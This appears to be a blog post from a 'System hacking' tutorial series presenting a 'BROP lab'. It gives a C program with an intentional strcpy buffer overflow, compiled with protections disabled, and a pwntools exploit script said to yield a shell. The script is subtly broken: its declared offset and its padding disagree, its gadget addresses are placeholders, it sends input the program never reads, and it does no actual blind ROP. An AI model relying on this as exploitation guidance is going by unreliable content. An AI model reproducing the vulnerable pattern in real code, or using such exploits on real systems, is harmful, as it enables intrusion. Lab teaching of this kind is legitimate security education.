strangerRidingCaml

Blind Return-Oriented Programming BROP Lab 본문

System hacking

Blind Return-Oriented Programming BROP Lab

woddlwoddl 2024. 5. 8. 01:59
728x90
Blind Return-Oriented Programming <span class="MathJax_Preview" style="color: inherit;"><span class="MJXp-math" id="MJXp-Span-33"><span class="MJXp-mi MJXp-italic" id="MJXp-Span-34">B</span><span class="MJXp-mi MJXp-italic" id="MJXp-Span-35">R</span><span class="MJXp-mi MJXp-italic" id="MJXp-Span-36">O</span><span class="MJXp-mi MJXp-italic" id="MJXp-Span-37">P</span></span></span><script type="math/tex" id="MathJax-Element-14">BROP</script> Lab

Blind Return-Oriented Programming BROP Lab

In this lab, we will learn how to create BROP payloads to exploit blind vulnerabilities.

Lab Activities:

1. Creating Vulnerable C Program:

First, let's create a vulnerable C program with a buffer overflow vulnerability.


  #include <stdio.h>
  #include <string.h>

  void vulnerable_function(char *input) {
      char buffer[64];
      strcpy(buffer, input);
  }

  int main(int argc, char *argv[]) {
      if (argc != 2) {
          printf("Usage: %s <input>\n", argv[0]);
          return 1;
      }

      vulnerable_function(argv[1]);

      printf("Program executed successfully.\n");
      return 0;
  }

Save the above code to a file named vulnerable.c and compile it with the following command:

$ gcc -o vulnerable -fno-stack-protector -z execstack vulnerable.c

2. Writing Exploit Script:

Now, let's write an exploit script in Python using pwntools to create BROP payloads.


  from pwn import *

  # Specify the path to the vulnerable binary
  binary_path = './vulnerable'

  # Offset to return address
  offset = 72

  # Build the BROP chain
  brop_chain = b''
  brop_chain += cyclic(64)  # Fill buffer with cyclic pattern
  brop_chain += p64(0xdeadbeef)  # Example ROP gadget address
  brop_chain += p64(0xdeadbeef)  # Example ROP gadget address
  # Add more ROP gadgets as needed

  # Craft the payload
  payload = brop_chain

  # Launch the exploit
  p = process(binary_path)
  p.sendline(payload)
  p.interactive()

Explanation of the Python script:

  • We specify the path to the vulnerable binary and the offset to the return address.
  • We build the BROP chain by adding ROP gadget addresses to the payload.
  • The payload consists of the BROP chain.
  • We launch the vulnerable binary and send the payload to exploit the blind vulnerability using BROP.
  • p.interactive() allows us to interact with the spawned shell.

3. Exploiting the Vulnerability:

Execute the Python script to exploit the buffer overflow vulnerability:

$ python exploit.py

Once executed, you should have a shell prompt, confirming the successful exploitation of the blind vulnerability using BROP.

'System hacking' 카테고리의 다른 글

One-Gadgets with PLT/GOT Overwrite Lab  0 2024.05.08
Race Condition Exploits Lab  0 2024.05.08
Sigreturn-Oriented Programming SROP Lab  0 2024.05.08
Return-Oriented Programming ROP Lab  0 2024.05.07
Frame Pointer Overwrite Attacks Lab  0 2024.05.07
'System hacking' Related Articles more